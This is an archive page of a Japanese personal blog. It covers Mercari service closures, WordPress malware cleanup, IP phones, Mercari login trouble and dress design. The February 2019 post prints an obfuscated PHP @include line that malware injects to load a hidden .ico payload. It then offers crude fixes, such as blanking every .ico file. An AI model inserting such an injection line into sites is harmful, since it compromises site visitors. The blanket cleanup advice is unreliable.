アーカイブ

メルカリ 閉鎖?

メルカリ・チャネル 2017年7月開始 2019年7月閉鎖

2019年4月26日のブログで、メルカリチャネルの閉鎖を予想したけど
やっぱり、やっぱり、閉鎖を発表。有料化の道は選択しなかったのか。

それ以外にも

メルカリ・アッテ 2016年3月開始 2018年5月閉鎖

メルカリ・イギリス 2015年開始  2018年12月18日撤退発表

メルカリNOW   2017年11月開始  2018年8月終了

メルチャリ   2018年2月開始     2019年7月終了

いろいろ閉鎖してる。

株式公開までいろいろ企画して、公開したら閉鎖、株主の立場にしてみりゃ???

2018年6月の上場初日に6000円の最高値を付け
8月9日の決算発表を境に株価は急落
8月21日には上場来最安値となる3715円
2019年6月12日現在 3140円

素人が参加するフリマやオークションは、
規制をすればするほど人が集まらなくなり流通総額が落ちる。
ここまで無駄使いしたら、メルカリの先は無いような気がする。
ただ、ヤフーがたどってきた道を真似すれば生き残れると思うけど
孫正義さんはできたけど、山田進太郎さんはできるかな?

投稿日: 2019年6月12日 カテゴリー: 未分類

メルカリチャネル

斬新なアイデアのメルカリ、しかし失敗も多い。

メルカリアッテが閉鎖になってしまった。当然といえば当然だろう。
始める前に予測はできただろうけど、
とりあえずやってみてダメならやめる、というのはすばらしい考えだと思う。

メルカリチャネル これもそのうち閉鎖になるのでは?
メルカリが描いているものとは違う使い方されてしまうような気がする。
ユーザーとのコミュニケーションがリアルタイムで行えるのはすばらしい
youtubeやニコニコだとどうしても録画がメインだからレスポンスが遅れる。
ただ、現時点でこれだけは言える。メリカリチャネルは物を売る場ではない。
商品説明やQ&Aを行う場所だ。しかもこのために利用料は実質無料
売れた商品の10%課金と言っても(故意に)物を売らなければ費用は0円
多くのリピートユーザーを抱えている業者にとって
メルカリ以外にも様々な窓口を持っているし、手数料も10%は高すぎる。
なので、メルカリでは商品を売らずに、メリカリチャネルで放送する、というスタンスが増えていくだろう。
メルカリにしか販売窓口を持っていないショップ、そんなのあり得ないし
今新参でも、売れ出せばいろんな窓口を持つのは当然必須だし、
販売窓口としてのメルカリは単なるオマケ程度になってしまうはず。

と考えると、将来的に、メルカリチャネルは有料化するしか道は残っていないのでは?

投稿日: 2019年4月26日 カテゴリー: 未分類

メルカリは失敗するかも?

メルカリのこの先が心配だ。個人の中古品の売買なんて、そんなに規模が大きくなるものではない、ヤフオクだって個人の中古品の売買の時代を経て量販する業者が参加して盛り上がったわけだし、今の流行だって何か作為的なものを感じる。ヤフオクを追い越したのではなく、ヤフオクが衰退してしまったから、それに代わる器として注目されただけで、個人の中古売買マーケットが拡大したわけではない。このままではいつか頭打ちになるだろうし、とうていアマゾンや楽天に取って代わることは無理だろう。
現在、事業拡大に必要なまじめな事業者を別枠に閉じ込めてしまってるし、メルカリチャネルなんて一部のマニアには受けるだろうけど、あんな子供のお遊びみたいので売れるわけない。これは断言できる。他の勢力が現れないうちに考えを変えたほうがいいと思う。
もちろん、メルカリが現状維持のままで伸びるつもりがないのなら、このままでいいんだろうけど、それなら何故株式上場したのか?疑問。

投稿日: 2019年4月12日 カテゴリー: 未分類

マルウェア駆除の一例(邪道ではありません)

/*00cxx*/

@include “\057ho\155e/\153xx\141xx\057xx\155xx\151xx\056ne\164/p\165bl\151c_\150tm\154/w\160-c\157nt\145nt\057wp\164ou\143h-\144at\141/d\145bu\147/.\067xx\141xx\060x.\151co”;

/*00cxx*/

index.phpなどに、こんな行を追加するマルウェアを見つけた。
wp_setteing.phpなども改変する。
この行を消しても、駆除できない。この行を改変するマルウェアが別に動いているからだ。
最後の「.\067xx\141xx\060x.\151co」というファイルが、このマルウェアの肝心なところ。実際に怪しいサイトに飛ばすコードが書かれている。これを空白にしてしまえば、マルウェアは生きていても、実害は起きない。いちおう問題は解決。
念のため、wordpressの全フォルダを調べて、icoという拡張子を持つファイルを全て空白にしてしまう(決して削除してはいけない)と安心。
実害はないが、マルウェア全部を消してしまいたいのなら、wordfennceなどのプラグインを使うと、改変されたファイルを探してくれるので、ソースコードをテキストエディタで修正してもとに戻す。

投稿日: 2019年2月12日 カテゴリー: 未分類

wordpress index.php 不正書き換え対策(邪道です)

wordpressでハッキング対策に業者にお金を払ったり、時間を費やして自分で作業したり そんな無駄なことをせずに、簡単に解決する方法

例えば、index.php が不正に書き換えられて困るなら index.php オリジナルを別のフォルダに入れておきます。毎日、1時間毎とか、cronを使って、オリジナルを元の場所にコピー ハッキングされて書き換えられようが、書き換えられてなくても常時、正規のファイルを元の場所にコピーし続ける。1時間に1回書き戻しコピーするなら、ハッキングされても、被害が出るのは最大59分間。スキルはハッカーのほうが上だと思ったら、きっぱり降参して、止めるなんてことせずに どうぞ、どうぞ、不正書き換えどんどんやってください、と言っておいて そして短い頻度で自動書き戻し、こういう方法もあります。

パスワードもしっかり変えているのに、ファイアーウォールも入れているのに、IP制限もかけているのに、どうして、どういうルートで書き換えてられてしまうんだろう、なんて悩む必要がありません。

この方法は邪道だと思いますが、、wordpress使ってブログ構築するってこと自体が邪道なんじゃないかと思います。

投稿日: 2019年2月7日 カテゴリー: 未分類

それでも wordpress を使い続ける方へ

3つのマルウェア対策

*パスワードを複雑なものにしましょう
ブルートフォースアタック(総当たり攻撃)を考えると、少しでも長いものがいいです。
覚えられないほど長いものは、手帳にメモしてもいいと思います。
遠隔からのアタックを防ぐためなので、近くの他人に見られてしまうリスクは無視しましょう。

*プラグイン Wordfence をインストールしましょう
有効化すると、メールアドレスを聞いてきますので、捨てメアドを入れて
mailing list => NO I agree チェックボックスにチェックを入れて continue
Premium License kry => No Thanks
でインストール完了
左メニュー wordefence => scan => next => next => got it
start new scan で走査開始
問題のあるファイルを羅列してきますので
各行をマウスで選択すると 「DELETE FILE」が使えるものはそのまま消してしまいましょう
「DELETE FILE」が使えなものは
[VIEW DIFFERNSEES]で違いを確認して、実際にそのファイルを編集する必要があります
修正したらscan を何回か繰り返して、
No new issues have been found.
と表示されるまでがんばりましょう。

*プラグイン Login No Captcha reCAPTCHA をインストールしましょう
googleアカウントをもていないのなら新規に取得して
Site Key と Secret Key を取得して、保存

投稿日: 2019年2月2日 カテゴリー: 未分類

WordPressが危ない!素人にWordPressは危険!

WordPressが危ない! 素人が使うべきではない。
最近、WordPressのマルウェア感染が著しい。無料なので、だれも責任をとってくれない。
有料のブログなら運営者がきちんと対策してくれるとこがほとんどだけど
なので、ここのサイトも危ないかも。
なんとか、がんばって自分で対策を講じていこうとがんばってるけど、この先・・・・
月100円から300円程度の有料ブロクサイトのほうがよっぽど楽だったりして・・・
昔から「タダほど高いものはない」とは、良くいったものだ。

マルウェアを仕込んで小銭稼いでいる輩に天誅を!

投稿日: 2019年1月30日 カテゴリー: 未分類

IP電話は仕事に使えるのか? 音質や遅延の問題

昔は、「IP電話の恩質が悪く、遅延が酷いため、仕事には使えない」という評価が多かったです。

では、今はどうなのでしょうか?

音質も遅延もかなり改善されて、なんとか仕事でも使えそうなところまで改善されてきています。

実際に、私も仕事に使っています。

でも、ひとつ注意していただきたいことがあります。

それは、電話機。型の古い中古品や、性能の低い安物は使わないこと。

料金安いんだから、電話機も安物でいいだろう、とけちってしまったら、

電話機の性能が足を引っ張って、通話品質が落ちる場合があります。

そういう時「やっぱりIP電話は音質が悪くて使えない」と既成概念を固めてしまったら、もったいないです。

 

投稿日: 2019年1月15日 カテゴリー: 未分類

メルカリでログインできない方へ

まだ変化を加えていない方のために、最初に重要な点を述べておきます

メルカリでなにか変更をするとき(例えば、スマホの機種変更、メアド変更、パスワード変更)など

こういう時は、まず事前に全ての出品を一時停止してから行って下さい。

とは言っても、困ってこのページにたどりついた人にとっては、後の祭りかもしれませんが、後学のために。

何故事前に全ての出品を一時停止することが重要なのか?

それは、メルカリの使用方法に何か変化を加えると、自分に非がなくても、一時的にログインできなくなる場合があるからです。メアドや電話番号やパスワードが正しくてもログインできなくなる時があります。スマホからはOKなのに、パソコンからはダメとかの現象も起きたりします。こいう時、掲示板などで相談しても、パスワード間違ってるんだろう、キャプスロック外せとか、キャッシュやクッキーを消せとか、アンインストールして再インストールしろ、とか的外れな回答ばかり返ってきます。もちろん、初歩的なミスの人は論外とします。

一番怖いのは、もし、出品中に、数日ログインできなくなって、その間に出品物が売れたら、購入者と連絡を取る方法がありません。数日後に復旧したとしても、たとえ「ログインができなくて困っていた」等と弁解しても、購入者が信じてくれるとは限りません。特に急いでいる購入者だった場合は、さぼっていたと思われて、「悪い」の評価をつけられたり、長期間発送できないと、事務局に怠慢な出品者だと通報される可能性もあります。

おそらく、メルカリ側は、なりすましログインを防止しようとしているのだと推測します。アプリの不具合も考えられますが、そうれなら早い時期に公式にアナウンスがあるはずです。あえて隠しておこなっている措置のような気がします。

とは言っても、全ての端末からログインできなくなるわけではなく、パソコンやスマホの何台かのうち、どれか1台はログインできる可能性があります。昔メルカリを最初に使い始めたスマホ、全く新しい別の新規スマホなど。どれかの端末でもログインに成功したら、パスワードの変更とかメアドの変更は後回しにして、まず全ての出品を一時停止するべきです。

それに、パスワードが間違っていないのに、パスワードを新しく変更しても、意味がないだけでなく、事態をより悪化させるだけです。メアドの変更も同様。

とりあえず、購入者に迷惑をかけないようにした上で、数日、事態が改善するのを待ちましょう。何もしないのがいいと思います。

 

 

 

 

 

 

 

 

投稿日: 2019年1月12日 カテゴリー: 未分類

クラシックなドレス

百年以上にわたって長い歴史の中で愛され続けるクラシック音楽の数々、死後その作品が巨額の金額で取引される画家、ストラディバリウスのような名器のバイオリン、流行とは関係なく、それらは存在し続ける。ドレスのデザインを見て、ふと疑問に思った。それなら、ドレスのデザインもそういうものがあってもいいのではないだろうか。毎年、流行の名の元、新しいデザインがどんどん発表され、過去のデザインは捨てられていってしまう。もちろん、生地の素材は年々新しい素材が生まれてきているから、生地は変わっていく可能性はあるけれど、デザインそのものは普遍ではないのか?毎年コロコロ変わるけど、前より良くなっているのか? 何回聞いても飽きないクラシック音楽のように、何回着ても飽きないデザインも存在するはずではないだろうか。もちろん、毎年同じデザインだと、デザイナーは食っていけないから、新しいデザイン=優れたデザイン、と思わせる必要があるんだろうけど、それでも、名器、名曲、名演奏と同じように、名デザインというのがあってもいいのでは?と思う。


 

投稿日: 2018年11月21日 カテゴリー: 未分類